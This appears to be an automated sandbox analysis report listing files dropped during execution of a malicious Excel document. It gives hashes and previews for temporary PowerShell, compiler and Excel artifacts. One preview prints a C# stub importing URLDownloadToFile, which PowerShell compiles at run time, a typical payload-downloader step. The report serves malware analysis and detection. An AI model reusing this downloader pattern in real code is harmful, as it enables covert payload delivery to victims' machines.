                                                                                                                                                                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\bhvD598.tmp

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x168c031a, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):21037056
                                                                                                                                                                                Entropy (8bit):1.1360818498582117
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:u91U91o2I+0mZ5lEHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:u9EXaLuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                MD5:A3C7B9CAD326B73864738C75BF73669E
                                                                                                                                                                                SHA1:5F34BB2A8F3670DD0AC4E2FF04CBE1E32C88B7A9
                                                                                                                                                                                SHA-256:21DA23EAFEABC860E56D4F71507AEB463D42F6D83AF0B60874E54AB44BE13553
                                                                                                                                                                                SHA-512:5BC227A503CC1046392B39F866B35A9345802C4E0DC6EA9F050A99C6A72F6C31BB925BE95A1F43C703CA1F7FA497CDD240FEA5A05872A76D74EFA2967279D9B9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:....... ........................u..............................;:...{.. ....|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\celvhtcxiwczckrdjzxnvyxm

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\djabbd3i.nsr.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\gdju4fyg.del.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\gyxb1epw.aho.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\htwmv1jn.dxs.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\jbmudnsm.0w1.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\lmxlxshx.tup.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\m4m1eqzr.i0r.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\my5qrm1b.orf.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):652
                                                                                                                                                                                Entropy (8bit):3.0744178664546213
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grysQhak7YnqqfQGPN5Dlq5J:+RI+ycuZhNGEakSfJPNnqX
                                                                                                                                                                                MD5:CA6836957A9E6330EFA320BC948B96D6
                                                                                                                                                                                SHA1:6AA69531002AFC94F897623DEDFD64020CCAECC6
                                                                                                                                                                                SHA-256:F257BD957AEED3EABF823AEDA41EC9E1F4B2FACBD2A0BBC0A97AAB830C6D7CC3
                                                                                                                                                                                SHA-512:1253AD0DE107E0D21DF8482E2B8CCDA8A94D82E6D9413D6C045F57ACC357284C3552052A7C95F27D89C0DEDC7BF2FE7356C878E9E1D76D45B430E176BA84CD75
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.v.q.l.o.o.o.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.v.q.l.o.o.o.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.0.cs

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):487
                                                                                                                                                                                Entropy (8bit):3.777856663326396
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:V/DsYLDS81zuNWv/0qRQvFMGHBQXReKJ8SRHy4HqlVzJZLmmlO2FQy:V/DTLDfucvevMXfHqPL2y
                                                                                                                                                                                MD5:41644CC7D79A640ACE6C0FF4910F08CA
                                                                                                                                                                                SHA1:0D5B30A377678B86A4CEAD014E9242C0736E8F3C
                                                                                                                                                                                SHA-256:81FE034A935E362D6704748F50CB1EEE0190456D5A63BB393155D3BA11B5A304
                                                                                                                                                                                SHA-512:C7DF30FE1B121BD4ACCFE50586C523A6EA66811B66AB5A0643CEBF11A093058B09422254088D7380EF02735ACC81B3D28E522FE481B7AF0EC6288DBDC1248F38
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace sildbFN.{. public class uAItGV. {. [DllImport("urLmOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr maKoAch,string sMNQofrlQE,string hZtVXNOP,uint TLqPzmU,IntPtr PtL);.. }..}.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):369
                                                                                                                                                                                Entropy (8bit):5.18098215257252
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23feWh+zxs7+AEszIP23feWZ:p37Lvkmb6Kz2W8WZEo2WZ
                                                                                                                                                                                MD5:06B33E3C0F3B4B3FA462CB6249C02436
                                                                                                                                                                                SHA1:44C0B6A2173F2152EA08CE72D257705DE3141C37
                                                                                                                                                                                SHA-256:E80ED657E06C7E2BBEC01E9A36875D491A1A3E8BC476203EFA1F51512D584759
                                                                                                                                                                                SHA-512:1B6760F79B4FBDEE138E8E4EEBF2B46C8E624AF7D6C69D4CADFEC4C024A920E731E4B17FF14890DEABEF1C6DE87DA67923AE3F22A6F30F41423D36B1EC0D43B9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.0.cs"

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.dll

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3072
                                                                                                                                                                                Entropy (8bit):2.830312001635949
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:etGScPBG5eAdF8sYgkOlqXLC8QP9VytkZfAvmAEMEWI+ycuZhNGEakSfJPNnq:6DsAde4lgQPFJGmAEMn1ulGEa3frq
                                                                                                                                                                                MD5:83C89B39F0F9AD579FD1644FF88FB86C
                                                                                                                                                                                SHA1:516E6741915BF018643225E6B87C9A279349F2E0
                                                                                                                                                                                SHA-256:90FDF2A55E624D69BE9386869E5B4825BF117204BC8D37B980EB668CD5CA6A15
                                                                                                                                                                                SHA-512:00FA9DE02BFB208F4F416D75E3EFB71BC07963C394A353CF2A9F9636F8C543D4FDE2C0E168AEB0B56FC3E1DD9D42B2A69E952A73FDD4CDD2A89BD18F602922DF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yvDg...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....}.....}.......................................... =.....P ......O.........U.....].....h.....q.....y...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.ov

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.out

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):866
                                                                                                                                                                                Entropy (8bit):5.305526067229823
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:AId3ka6Kz2IEo2HKaMD5DqBVKVrdFAMBJTH:Akka602IEo2HKdDcVKdBJj
                                                                                                                                                                                MD5:6A7E399796E3F438256D22559335C8E2
                                                                                                                                                                                SHA1:87FCE6D965B9859379727B15BD42BFB6D3D2EF0C
                                                                                                                                                                                SHA-256:331C8A5DE63BA2F398730A78A780604BE868F4F1754006F8818327E2DBEB0AB9
                                                                                                                                                                                SHA-512:401D97D7D85C111D2BD668D925D07E3C690F1E863E80EE437B2177EB0CB81314071CFE668203ED1F1E9889B1EB5D884161830EF99D949CF419BE3D72C046139A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\q3xnw5ef.ygf.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\shjrjaxp.hry.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ujcyfur4.fse.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\yqaz1jdk.qfy.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF5ADC8DB78B38F887.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Nov 25 11:48:53 2024, Security: 1
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):204800
                                                                                                                                                                                Entropy (8bit):7.826178543203008
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:x1JTHBq6U/6xVsMKgpNc+ZwuURRTd9STL0bfC3LajCe7r7Ssb28HQiR:x1lHBMixiMK6G+ZFrTkC3LajCsfA8
                                                                                                                                                                                MD5:B8DC65936F8AD62DCA4D99AB246CE0F6
                                                                                                                                                                                SHA1:48503B23EEB5DCA59B701AC0CCE37E35564DF669
                                                                                                                                                                                SHA-256:A5317E6F58448EF456E0EC03901CE3EA646FC18F6CB46682CAD2BDE8E7E11DA7
                                                                                                                                                                                SHA-512:CF9EB926C3EB63CE402BCB819788CAF3864CB4FD13CEA9347D513E7538CA39649CF5C3C80578457816575D74154D1483BAFEA4D5A079CDA352409239D07BF410
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................y................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF63336C50ECE86A70.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF9A8F8BC730AECAC4.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFA6DCA65DB3BD5B16.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
